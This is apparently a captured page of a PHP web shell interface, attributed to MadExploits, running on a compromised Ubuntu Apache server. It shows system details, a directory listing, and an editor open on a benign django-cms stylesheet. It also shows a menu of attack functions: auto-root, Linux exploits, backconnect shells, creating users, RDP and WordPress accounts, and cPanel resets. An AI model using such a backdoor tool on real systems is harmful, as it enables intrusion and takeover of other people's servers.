Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
static /
cms /
sass /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
mixins
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
cms.base.scss
1.71
KB
-rw-r--r--
cms.pagetree.scss
503
B
-rw-r--r--
cms.welcome.scss
467
B
-rw-r--r--
cms.wizard.scss
1.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cms.base.scss
@charset "utf-8"; /*! * @copyright: https://github.com/divio/django-cms */ //############################################################################## // IMPORT SETTINGS @import "settings/all"; @import "mixins/all"; //############################################################################## // IMPORT COMPONENTS @import "components/reset"; @import "components/general"; @import "components/animation"; @import "components/iconography"; @import "components/hovertooltip"; @import "components/dialog"; @import "components/content"; @import "components/loader"; // div.cms needs to beat .cms-reset a selectors div.cms { @import "components/tooltip"; @import "components/button"; @import "components/dropdown"; @import "components/toolbar"; @import "components/modal"; @import "components/sideframe"; @import "components/structureboard"; @import "components/subnav"; @import "components/clipboard"; @import "components/pluginpicker"; @import "components/shortcuts"; *:not(.cms-modal):focus { outline: 2px dotted $gray-darker; outline-offset: -3px; &::-moz-focus-inner { border: 0 !important; } @media screen and (-webkit-min-device-pixel-ratio: 0) { outline: 5px auto -webkit-focus-ring-color; outline-offset: -3px; } .cms-hover-tooltip { display: none; } } @import "components/pagetree/node-state"; } //############################################################################## // DJANGO DEBUG TOOLBAR FIX // removed as of: //github.com/divio/django-cms/issues/2476 // #djDebug #djDebugToolbarHandle { // top:35px !important; border-right:none !important; // }
Close